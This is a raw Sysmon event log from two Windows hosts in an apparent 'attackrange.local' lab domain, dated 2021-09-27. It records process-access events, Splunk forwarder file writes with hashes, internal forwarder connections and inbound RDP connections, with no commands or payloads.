09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.395{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001056802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.170{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54242-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001056801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.073{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51451-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:05.473{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D823858F790F9A7CF05F88E69C757B8B,SHA256=2C89166A5A2003B622179CC31D857DE6A84C87E756D6E8A044F1799C5F4D40B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:05.239{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08ECE4B68FA69683CBA654A333CC69F2,SHA256=EDA05DF270D660220DC2C389F4441E258ADE2879B8ADE02338627D3B78D30BC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981322Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:05.127{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97949366FA47C981FC224411743DE535,SHA256=D8B769781833D711BA268F813BA2180E811DCEC253ADE488AA157BD1191BA5E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:06.849{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7786477A4466F7C4F2602B3C58B4FF34,SHA256=AE8F87885AA0626721AE7868B9020DD8EEE25F36FAE59BA248F393713F6292B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:05.490{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63753-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:06.255{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6CCF7CE3D999CBE2571B14E0A042EDD,SHA256=366920A51DE8BAE78A9173A578B07A51BE828D8CF0EE007AF646B20D464CCF45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981324Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:03.599{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52027-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981323Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:06.143{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43B7246A4984238BDB7E05E592A602CB,SHA256=9A72C9B9EFA7FBD86DE708AE3C94339F9062E63C1DF5315935C95CB231ABA6E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:07.380{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=744132A9B5E052921E8D977BCBDF829F,SHA256=FB318D76D498C9298773F3D761B2E6B69E3E6541CCCA590B9956C6B3F44A87ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981327Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:07.674{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22EE619B77D2258B4469707DB6E7BFDD,SHA256=BDE9F625BE58157041162EADFAD2FE3BF9E75E9EDA7FD0E1CECE015D2BC5BF79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981326Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:07.674{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D51CB1E8863D6CB681FACA9E259F13E6,SHA256=BCF1D4CE82A8512F46801E5602F1D9EE9E0A42C379853909BEBBA3B44987DDEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981325Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:07.143{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=986AE0A1DAFE8CD3F407B02612DE3FE5,SHA256=8290163E21AA03DAF63BE795726FC96F658EC8DAC4F5DDDC168985FBA82069FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:08.442{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8EF995E17ACC0D886B4F2D72D2ABA52,SHA256=493A961A4094DF902CD134B88F368596B6E9FDB14C6B8D49170583297C5D1CC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981329Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:05.614{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-60949-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981328Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:08.377{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8F0444184E746C6077894A9ACADBF4E,SHA256=75B57459E47968BD472A4B2EF4E5D7BC73EB1D29AC06E0D4BCA7F2AB3332CDD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:09.443{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDDD7B491192799E65CD11E5A3AA02A9,SHA256=D9BD80B3645B6B5E1E0A5F790C42F8219789C3BAAA1F53DC5F515D9C7C82936A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981331Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:06.750{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59543-false10.0.1.12-8000- 23542300x8000000000000000981330Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:09.612{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=184DDE98E0D5B01F6600D6CA1D3D8E75,SHA256=500A973C21E82004FF3F4B72090C3A4302EF26304F14547F1CB757731BF4A52F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981332Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:10.768{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3283E7EA572C51DB9C0AFBF308681DD9,SHA256=47978CBA157FEA61EBD6595BDCF19014822E296894A818C3018DC67C89D666FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:10.536{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFE5F5B5CF4842755087760A534E3672,SHA256=FA62B482CF9BAAB97F8AE0B0AE003E76879F4D837BF5B8F80F3CD7FD5B88AE5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981333Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:11.987{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D2A20C080DA8699365D525301B77BF,SHA256=DD07CBDD25D0ED82C129CF0F4C0BC33C1B1B2179BE24FAD01C353D713EB532CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:09.998{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54243-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:11.630{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0067E582417FC85FE0AB8CBE5A0CD92A,SHA256=B1553744415E267ADF19E852C27C5471A1DD9E390BCD5FA8B93913FF14B35337,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:12.771{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD6DD3641D1E6922BE62783D9835A010,SHA256=727061744AA878A100DCA6B356C987D9976F4EF8CFBA5C49F6563EFF6F199C06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:13.787{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0892933429EF6D0E87E67F9773A121,SHA256=A16CC74A32D46E5C207DA46AE847CB60E8443EB0F850FD63CAF4FE1AB7451E60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981335Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:13.955{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981334Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:13.205{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64241E6F312017B78379903023C79E06,SHA256=EBA1B34E1205587756FCD31B496C27328E75023508822B5B3FC6540B5A865681,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:14.802{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66FAE2DAD459104A89219EC0323A734A,SHA256=E842EE431C198AD69D79628C71A5C8C4719EA2417F084B43D5B20336D3686309,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981339Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:14.299{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFDDF5234811723B51D47178B64D2B8D,SHA256=6F18170C2FFD3D8364D79A2E994C80D9A115F873B05A2D6DBE84BF43BB5D8E5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981338Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:14.299{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22EE619B77D2258B4469707DB6E7BFDD,SHA256=BDE9F625BE58157041162EADFAD2FE3BF9E75E9EDA7FD0E1CECE015D2BC5BF79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981337Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:14.205{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6C67EB035C10924F389761C35640EB2,SHA256=9E651661702D0864AADFD4D5A983A9F98039582D15113C54C521C978C0F9A809,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981336Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:11.173{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56693-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001056816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:15.834{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC51500ED339B02AD1D83B5B95465108,SHA256=9D406F69E028EF3F9F637FA6E82D25B6A451E7A2AC3CB1BCC54E7C00E4666CEA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981341Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:11.799{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54586-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981340Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:15.221{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2D26D105754F5A6860C602438E72C02,SHA256=F56CEE80EC60F6C6573EE67E05965BA67813F073B23452CF055D4E1F4F6CAE2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:15.553{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:16.990{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0D5DD5A69BF9B8B9E04661B75B9D914,SHA256=90670991A529C16ED411EC0426A1CDD32A3F007008129AF572662E53FB379F42,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981343Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:12.578{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59544-false10.0.1.12-8089- 23542300x8000000000000000981342Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:16.237{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A770689C8F13F583C20D0891AF1B4202,SHA256=0169DA30A4A6BC8B93E8BE6050120720C9E43415F20FCCA228F2FD831D6FAAC4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001056817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:24:16.396{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b381-0x715071f9) 